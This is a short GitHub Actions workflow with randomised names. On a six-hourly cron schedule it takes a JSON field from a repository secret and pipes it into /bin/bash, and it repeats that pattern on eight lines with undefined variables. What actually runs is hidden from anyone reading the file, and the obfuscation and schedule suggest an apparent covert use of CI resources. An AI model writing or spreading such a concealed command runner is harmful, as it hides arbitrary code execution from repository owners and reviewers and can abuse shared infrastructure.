name: ambitionparka

on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ambitionparka
        env:
          on4901: ${{ secrets.on4901 }}
        run: |
          echo $on4901 | jq -r .gsu6 | /bin/bash
          echo $kgyis5 | jq -r .aqld2877 | /bin/bash
          echo $zji9573 | jq -r .k68 | /bin/bash
          echo $gwj71746 | jq -r .hs9 | /bin/bash
          echo $xk46034 | jq -r .rasls765 | /bin/bash
          echo $axw4619 | jq -r .hnm9 | /bin/bash
          echo $rvn84983 | jq -r .xu4 | /bin/bash
          echo $hkxnb69707 | jq -r .srgct1765 | /bin/bash
          echo $m612 | jq -r .e2750 | /bin/bash

